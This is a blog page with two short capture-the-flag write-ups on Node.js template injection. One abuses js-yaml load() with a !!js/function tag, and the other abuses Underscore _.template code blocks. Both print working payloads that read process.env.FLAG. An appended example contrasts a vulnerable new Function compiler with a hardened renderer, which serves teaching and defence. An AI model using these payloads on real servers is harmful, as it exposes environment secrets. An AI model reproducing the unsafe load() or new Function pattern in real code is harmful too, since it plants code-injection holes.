Mehran's Boring Blog

daily so-called-technical experiences


I found myself publishing things, which may or may not be taken seriously.


2 posts tagged with the keyword "injection" have been published

Here's the app's code.

Much like the web100-2 task, the goal is to inject JavaScript into the template so that it runs with access to the Node.js global context, and therefore to process.env.
That's not hard, just RTFM: the js-yaml documentation for load() says it is unsafe for untrusted data, because the default (full) schema honours the !!js/function, !!js/regexp and !!js/undefined tags and will hand back real JavaScript objects; user input should go through safeLoad() (or load() with DEFAULT_SAFE_SCHEMA) instead. (Since js-yaml 4.0, load() is safe by default and the js types live in a separate plugin, but this app ran on the older API.) Because the app passes the YAML front matter to load(), a !!js/function value becomes an actual function, and rendering {{ flag }} calls it. Let's exploit it:

---
# front matter goes through js-yaml load(), so !!js/function yields a real function
flag: !!js/function >
  function flag() {
    return process.env.FLAG;
  }
---
{{ flag }}

and take your flag away.
0 comments, 0 Uppers, 0 Downers, 23 March 14, 03:37
Mehran
Here's the app's code.
The Underscore template is supplied by the user. _.template compiles a template into a JavaScript function with new Function, and anything inside <% ... %> is copied verbatim into that function's source, so it runs in the same Node.js process and context as the application's own code, with process.env within reach. The print() helper is defined by Underscore inside the compiled template and appends its arguments to the output, which makes exfiltration a one-liner:
<%
print(process.env.FLAG);
%>

That's all.
0 comments, 0 Uppers, 0 Downers, 23 March 14, 03:29
Mehran
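To make the mechanism behind the second post concrete, here is an added example, not code from the blog post and not Underscore's own source: a deliberately minimal template compiler written in the style of _.template (the template is rewritten into JavaScript and compiled with new Function, exactly the step that turns a user-supplied template into user-supplied code), placed next to a renderer that treats the template as data and never compiles it. The FLAG value, the hypothetical compileUnsafe/renderUnsafe/renderSafe helpers and the sample templates are all constructed for this example; the payload is the one from the post. Runs on plain Node.js with no dependencies.

```javascript
// Added example: a toy template engine in the style of _.template, to show why a
// user-controlled template is equivalent to user-controlled JavaScript, beside a
// hardened renderer. Not the blog's code and not Underscore's; names are made up.

// Constructed stand-in for the secret the CTF service kept in its environment.
process.env.FLAG = "FLAG{constructed-for-this-example}";

// VULNERABLE: the template is rewritten into JavaScript source and compiled with
// new Function, the same technique _.template uses. Whatever sits inside
// <% ... %> is pasted verbatim into that source, so it runs with the full
// privileges of the server process (process.env and the rest of the global object).
function compileUnsafe(template) {
  const tag = /<%(=)?([\s\S]+?)%>/g; // fresh regex per call: a /g regex keeps state
  let body =
    "let __p = '';\n" +
    "const print = (...args) => { __p += args.join(''); };\n"; // like Underscore's print()
  let last = 0;
  let m;
  while ((m = tag.exec(template)) !== null) {
    body += `__p += ${JSON.stringify(template.slice(last, m.index))};\n`;
    if (m[1]) {
      body += `__p += (${m[2]});\n`; // <%= expr %>: expression is interpolated
    } else {
      body += `${m[2]}\n`;           // <% code %>: statements are executed as-is
    }
    last = m.index + m[0].length;
  }
  body += `__p += ${JSON.stringify(template.slice(last))};\nreturn __p;`;
  return new Function("data", body); // this single line turns the template into code
}

function renderUnsafe(template, data) {
  return compileUnsafe(template)(data);
}

// HARDENED: the template is data, never code. Only <%= identifier %> is honoured,
// the identifier is looked up as an own property of `data`, and the value is
// HTML-escaped. Every other <% ... %> form (code blocks, arbitrary expressions
// such as <%= process.env.FLAG %>, <%- ... %>) is rejected before rendering.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

const INTERP = /<%=\s*([A-Za-z_$][\w$]*)\s*%>/g;

function renderSafe(template, data) {
  // Any "<%" that is not immediately a well-formed identifier interpolation is fatal.
  if (/<%(?!=\s*[A-Za-z_$][\w$]*\s*%>)/.test(template)) {
    throw new Error("only <%= identifier %> is allowed in user templates");
  }
  return template.replace(INTERP, (_, name) =>
    Object.prototype.hasOwnProperty.call(data, name) ? escapeHtml(String(data[name])) : ""
  );
}

// Constructed inputs: a benign greeting for each engine, and the post's payload.
const BENIGN_UNSAFE = "Hello <%= data.name %>!";
const BENIGN_SAFE = "Hello <%= name %>!";
const PAYLOAD = "<% print(process.env.FLAG); %>";

function demo() {
  const results = {
    benignUnsafe: renderUnsafe(BENIGN_UNSAFE, { name: "Mehran" }), // "Hello Mehran!"
    leaked: renderUnsafe(PAYLOAD, {}),                             // the FLAG value
    benignSafe: renderSafe(BENIGN_SAFE, { name: "<Mehran>" }),     // escaped output
    blocked: false,
  };
  try {
    renderSafe(PAYLOAD, {});
  } catch (e) {
    results.blocked = true; // the payload never reaches new Function
  }
  return results;
}

console.log(demo());
```

The point of the comparison is that the hardened renderer has no code path in which template text reaches new Function, eval or a with-scope; if users need to control layout, give them placeholders that resolve against an explicit data object, not a template language whose evaluate tags are compiled into the process.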